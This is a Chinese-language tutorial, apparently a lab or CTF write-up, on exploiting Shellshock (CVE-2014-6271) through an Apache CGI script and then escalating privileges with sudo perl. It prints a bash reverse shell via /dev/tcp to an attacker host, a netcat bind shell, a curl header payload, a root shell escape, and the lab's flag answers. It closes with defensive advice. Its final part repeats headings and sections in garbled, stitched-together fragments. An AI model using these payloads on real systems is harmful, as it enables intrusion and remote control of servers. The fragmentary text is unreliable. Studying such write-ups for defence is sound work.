Shellshock漏洞利用与权限提升教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用Nmap进行初始端口扫描：<\/p>

nmap -p- 10.10.10.56 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口：

80\/tcp: Apache httpd 2.4.18 (Ubuntu)<\/li>
2222\/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.2<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 Web目录枚举<\/h3>
使用DIRB工具进行Web目录扫描：<\/p>
dirb http:\/\/10.10.10.56\/
<\/span><\/span><\/code><\/pre>2. Shellshock漏洞利用<\/h2>
2.1 漏洞背景<\/h3>
Shellshock（CVE-2014-6271）是Bash shell中的一个严重安全漏洞，允许攻击者通过环境变量注入任意命令。在Apache mod_cgi环境下，HTTP头部的某些字段会被转换为环境变量，从而可能被利用。<\/p>
2.2 漏洞验证<\/h3>
检查CGI脚本是否存在漏洞：<\/p>
searchsploit -w apache mod_cgi
<\/span><\/span><\/code><\/pre>2.3 利用脚本分析<\/h3>
使用Python编写的Shellshock利用脚本关键部分：<\/p>
headers =<\/span> {"Cookie"<\/span>: payload, "Referer"<\/span>: payload}
<\/span><\/span>c =<\/span> httplib.<\/span>HTTPConnection(rhost)
<\/span><\/span>c.<\/span>request("GET"<\/span>,page,headers=<\/span>headers)
<\/span><\/span><\/code><\/pre>2.4 反向Shell利用<\/h3>
执行反向Shell攻击：<\/p>
python2 .\/exp.py payload=<\/span>reverse rhost=<\/span>10.10.10.56 lhost=<\/span>10.10.16.14 lport=<\/span>10032<\/span> pages=<\/span>\/cgi-bin\/user.sh
<\/span><\/span><\/code><\/pre>Payload构造：<\/p>
\/bin\/bash -c "\/bin\/bash -i >& \/dev\/tcp\/"<\/span>+lhost+"\/"<\/span>+str(<\/span>lport)<\/span>+" 0>&1 &"<\/span>
<\/span><\/span><\/code><\/pre>2.5 绑定Shell利用<\/h3>
绑定Shell方式（备用方案）：<\/p>
python2 .\/exp.py payload=<\/span>bind rhost=<\/span>10.10.10.56 rport=<\/span>1234<\/span> pages=<\/span>\/cgi-bin\/user.sh
<\/span><\/span><\/code><\/pre>Payload构造：<\/p>
\/bin\/bash -c 'nc -l -p "+rport+" -e \/bin\/bash &'<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升阶段<\/h2>
3.1 检查sudo权限<\/h3>
获取当前用户的sudo权限信息：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>3.2 Perl权限提升<\/h3>
利用Perl执行权限提升：<\/p>
sudo perl -e 'exec "\/bin\/sh";'<\/span>
<\/span><\/span><\/code><\/pre>3.3 获取flag<\/h3>


用户flag位置：User.txt<\/code><\/p>

内容：52bf59994f4a8d97df4daa775641ab05<\/code><\/li>
<\/ul>
<\/li>

根flag位置：Root.txt<\/code><\/p>

内容：0bc6d190e24dca08e42174ed7a7ad1a7<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
4. 防御措施<\/h2>
4.1 Shellshock防御<\/h3>

升级Bash到最新版本<\/li>
禁用不必要的CGI脚本<\/li>
使用Web应用防火墙(WAF)过滤恶意请求<\/li>
<\/ol>
4.2 权限提升防御<\/h3>

限制sudo权限，避免不必要的命令执行权限<\/li>
定期审计sudoers文件<\/li>
使用最小权限原则配置服务账户<\/li>
<\/ol>
5. 扩展知识<\/h2>
5.1 Shellshock变种<\/h3>

CVE-2014-6277<\/li>
CVE-2014-6278<\/li>
CVE-2014-7169<\/li>
<\/ul>
5.2 替代利用方法<\/h3>
使用cURL直接测试Shellshock漏洞：<\/p>
curl -H "User-Agent: () { :; }; echo; echo; \/bin\/bash -c 'id'"<\/span> http:\/\/target\/cgi-bin\/test.cgi
<\/span><\/span><\/code><\/pre>5.3 其他权限提升方法<\/h3>

内核漏洞利用<\/li>
SUID二进制滥用<\/li>
定时任务劫持<\/li>
环境变量劫持<\/li>
<\/ol>
6. 参考资源<\/h2>

Shellshock漏洞官方说明：https:\/\/shellshocker.net\/<\/li>
Exploit-DB相关利用代码：https:\/\/www.exploit-db.com\/exploits\/34900<\/li>
Apache mod_cgi安全指南：https:\/\/httpd.apache.org\/docs\/2.4\/howto\/cgi.html<\/li>
<\/ol>

Shellshock漏洞利用与权限提升教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Shellshock漏洞利用<\/h2>

2.1 漏洞背景<\/h3> Shellshock（CVE-2014-6271）是Bash shell中的一个严重安全漏洞，允许攻击者通过环境变量注入任意命令。在Apache mod_cgi环境下，HTTP头部的某些字段会被转换为环境变量，从而可能被利用。<\/p>

3. 权限提升阶段<\/h2>

4. 防御措施<\/h2>

5. 扩展知识<\/h2>

6. 参考资源<\/h2> Shellshock漏洞官方说明：https:\/\/shellshocker.net\/<\/li> Exploit-DB相关利用代码：https:\/\/www.exploit-db.com\/exploits\/34900<\/li> Apache mod_cgi安全指南：https:\/\/httpd.apache.org\/docs\/2.4\/howto\/cgi.html<\/li> <\/ol>

2.1 漏洞背景<\/h3>
Shellshock（CVE-2014-6271）是Bash shell中的一个严重安全漏洞，允许攻击者通过环境变量注入任意命令。在Apache mod_cgi环境下，HTTP头部的某些字段会被转换为环境变量，从而可能被利用。<\/p>

6. 参考资源<\/h2>

Shellshock漏洞官方说明：https:\/\/shellshocker.net\/<\/li>
Exploit-DB相关利用代码：https:\/\/www.exploit-db.com\/exploits\/34900<\/li>
Apache mod_cgi安全指南：https:\/\/httpd.apache.org\/docs\/2.4\/howto\/cgi.html<\/li> <\/ol>